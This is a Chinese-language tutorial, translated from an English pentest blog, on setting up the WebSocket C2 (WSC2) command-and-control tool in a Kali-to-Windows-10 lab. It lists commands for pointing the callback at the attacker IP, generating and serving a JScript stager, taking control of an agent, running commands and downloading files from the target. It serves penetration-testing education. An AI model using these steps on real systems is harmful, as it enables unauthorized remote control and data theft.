C&C远控工具:WebSocket C2

SoftNight 安全工具 2019年5月6日发布
Favorite收藏

导语:这篇文章,我们将学习另一款C&C远控工具WebSocket C2,也被称为WSC2。

这篇文章,我们将学习另一款C&C远控工具WebSocket C2,也被称为WSC2。

介绍

WSC2主要是一款后渗透测试工具。WSC2会使用WebSocket和一个浏览器进程。它的作用是在目标靶机上运行的客户端和实际充当C2服务器的控制器之间作为C2通信通道。这款工具使用Python开发的。

本文演示环境

· 攻击机:kali Linux

· 靶机:Windows 10

安装

首先,我们要在攻击机上安装此工具。我们可以直接从GitHub上下载该工具,下载命令如下:

git clone //github.com/Arno0x/WSC2.git

1.png

 

执行完上述命令之后,就会创建一个WSC2目录。现在我们cd到这个目录下,然后ls一下,查看我们刚才下载了什么内容,如下图:

cd WSC2/
ls

2.png

接下来,我们需要安装这个工具的依赖条件。安装依赖的方法有很多,这里我们直接使用pip命令,需要安装的依赖都在requirement.txt这个文件中,直接指定该文件安装即可:

pip install -r requirements.txt

3.png

刚才我们ls查看目录内容时,可以看到有一个config.py文件,我们需要修改这个文件,这样才能在我们的系统中获取到会话。我们使用nano来编辑文件,如图所示,当我们用nano打开config.py文件时,我们可以看到有一个CALLBACK变量,它的值是一个IP地址。这里我们需要把它修改成我们攻击机的IP地址,也就是这个例子中的kali的地址,如下图:

nano config.py

4.png

攻击目标

接下来,我们就可以运行这个工具了,在运行之前,我们要先检查一下是否具有执行权限。运行起来之后,我们会看到一个酷炫的banner信息,如下图所示,还有一些关于作者,版本和工具的详细信息。接着,它就会在当前目录下创建一个子incoming子目录,这个目录作为一个缓存使用,保存来自靶机的文件:

./wsc2.py

5.png

接下来,我们要创建一个batch文件。不过我们也可以使用其他类型的stager。这个工具提供的stager类型是jscript1,jscript2,jscript3。这里我们会使用jscript1,因为它不需要进行编译。其他的stager都需要进行编译。下面这条命令会在stagers目录下创建一个wsc2Agent1.js文件,如下图:

genStager jscript1

6.png

接下来,我们要把这个文件发送到靶机上。我们首先再打开一个终端,然后cd到stagers目录下。这里我们启用一个Python服务器,将文件分享靶机。当然了,也有很多其他方法可以将文件传到靶机上,大家可以自己多摸索,如下:

cd stagers/
ls
python -m SimpleHTTPServer 80

7.png

一旦这个jscript文件在靶机中执行之后,我们就可以在终端中看到一条消息,一个新的agent连接成功。我们可以使用list命令来查看一下有哪些agents。

list

8.png

然后,我们复制这个AgentID,然后use这个AgentID与会话交互,如下图所示:

use [AgentID]

9.png

命令执行

我们输入cli命令,然后就可以在靶机上运行powershell命令。这里我们就简单地执行一个systeminfo命令,执行之后,我们就可以看到靶机的详细的系统信息了,如下图:

cli
systeminfo

10.png

文件下载

除此之外,我们还可以从靶机上下载文件。下载文件的命令是getFile,后面接文件名或者路径。这个命令会将靶机上的文件下载到我们的攻击机上,如下图:

help getFile
getFile sample_text.txt

11.png

下载的文件会保存在子目录incoming中,我们使用cat命令来查看下载文件的内容,如下图:

cd incoming/
ls
cat sample_file.txt

12.png

本文翻译自:https://www.hackingarticles.in/command-control-websocketc2/如若转载,请注明原文地址: https://www.4hou.com/tools/17528.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论